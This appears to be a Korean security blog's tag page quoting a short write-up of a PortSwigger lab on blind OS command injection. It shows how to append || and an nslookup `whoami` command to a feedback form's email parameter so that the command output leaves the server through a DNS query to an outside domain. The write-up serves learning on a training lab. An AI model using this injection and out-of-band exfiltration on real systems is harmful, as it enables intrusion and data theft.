'lab: blind os command injection with out-of-band data exfiltration' 태그의 글 목록

lab: blind os command injection with out-of-band data exfiltration 1

Lab: Blind OS command injection with out-of-band data exfiltration 문제 풀이(WriteUp)

문제 설명DNS 쿼리를 통해 whoami 결과 확인문제 풀이문제 접속 후 Submit feedback 접근 피드백 양식에 맞게 작성 후 요청 피드백 요청 시 email 파라미터에 || 추가 후 Command 삽입nslookup `whoami`.주소 를 통해 whoami의 결과 값을 포함하여 DNS 질의 도메인 이름 앞부분에 whoami 결과가 담겨져서 요청이 오게 됨

WEB hacking/PortSwigger 2025.02.17

Roronoa

1. Wargame 문제들을 풀어보고 풀이는 공유하는 블로그입니다. 2. 해킹 우회기법 및 스킬을 공유하는 블로그입니다. 3. 취약점 분석 및 익스플로잇 방법 들을 공유하는 블로그입니다.

WebHacking, DreamHack, 시스템해킹, 웹 해킹, 버퍼오버플로우, 취약점, 워 게임, 해킹, 웹해킹, wargame, CSRF, SQL Injection, 드림핵, 웹, CTF, XSS, tryhackme, 워게임, web, 취약점 분석,

Today :
Yesterday :

일	월	화	수	목	금	토
1	2	3	4	5	6	7
8	9	10	11	12	13	14
15	16	17	18	19	20	21
22	23	24	25	26	27	28
29	30

lab: blind os command injection with out-of-band data exfiltration 1

티스토리툴바